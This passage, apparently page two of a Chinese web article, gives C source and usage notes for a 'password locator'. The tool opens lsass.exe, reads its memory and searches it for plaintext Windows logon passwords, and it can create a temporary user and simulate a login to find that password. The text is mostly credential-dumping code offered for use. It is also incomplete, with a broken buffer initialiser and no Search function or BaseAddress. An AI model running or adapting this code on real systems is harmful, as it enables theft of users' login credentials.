----------------- DWORD GetLsassPID() { HANDLE hProcessSnap; HANDLE hProcess = NULL; PROCESSENTRY32 pe32; DWORD PID = 0; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if( hProcessSnap == INVALID_HANDLE_VALUE ) { printf("Fail To Create Snap Shot\n"); return 0; } pe32.dwSize = sizeof(PROCESSENTRY32); if( !Process32First(hProcessSnap, &pe32)) { CloseHandle(hProcessSnap); // Must clean up the snapshot object! return 0; } do { if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0) { PID = pe32.th32ProcessID; break; } }while(Process32Next( hProcessSnap, &pe32)); CloseHandle( hProcessSnap); return PID; } // End GetLsassPID() //------------------------------------------------------------------------------------ // Purpose: To Find The Password // Return Type: BOOLEAN // Parameters: // In: DWORD PID -> The Lsass.exe's PID //------------------------------------------------------------------------------------ BOOL FindPassword(DWORD PID) { HANDLE hProcess = NULL; char Buffer[5 * 1024] = ; DWORD ByteGet = 0; int Found = -1; hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process if (hProcess == NULL) { printf("Fail To Open Process\n"); return FALSE; } if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe { printf("Fail To Read Memory\n"); CloseHandle(hProcess); return FALSE; } CloseHandle(hProcess); Found = Search(Buffer,ByteGet); // Search The Password if (Found >= 0) // We May Find The Password { if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not { printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password); } } else { printf("Fail To Find The Password\n"); } return TRUE; } // End FindPassword //------------------------------------------------------------------------------------ // Purpose: Check If The Box Is Windows 2003 // Return Type: BOOLEAN // Parameters: None //------------------------------------------------------------------------------------ BOOL Is2003() { OSVERSIONINFOEX osvi; BOOL b0sVersionInfoEx; ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX)); osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX); if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi))) { osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO); } return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2); } // End Is2003() // End Of File 附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码. 用法: 1.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置 2.Locator 用户名 密码 -> 在系统中建立一个参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置,生成的帐户程序运行完后会自动删除。
上一页 [1] [2] |